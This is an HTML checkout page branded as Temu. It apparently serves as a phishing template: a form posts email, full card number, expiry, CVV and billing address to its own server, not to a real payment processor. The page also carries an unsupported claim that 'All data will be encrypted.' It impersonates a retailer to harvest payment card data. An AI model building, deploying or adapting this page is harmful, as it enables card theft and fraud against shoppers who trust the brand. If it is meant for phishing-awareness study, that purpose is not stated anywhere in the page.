<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Temu - Cart Checkout</title>
    <link rel="stylesheet" href="/static/style.css">
</head>
<body>
    <div class="container">
        <h1>🛒 Temu Checkout</h1>

        <form method="POST">
            <label>Email Address:</label>
            <input type="email" name="email" required>

            <label>Card Number:</label>
            <input type="text" name="card" placeholder="xxxx xxxx xxxx xxxx" required>

            <label>Expiration Date:</label>
            <input type="text" name="expiry" placeholder="MM/YY" required>

            <label>CVV:</label>
            <input type="text" name="cvv" placeholder="123" required>

            <label>Billing Address:</label>
            <textarea name="address" placeholder="123 Main St, City, Country" required></textarea>

            <button type="submit">Checkout</button>
        </form>

        <p class="note">All data will be encrypted. Safe Payment Options: Visa, MasterCard, Amex, PayPal</p>
    </div>
</body>
</html>


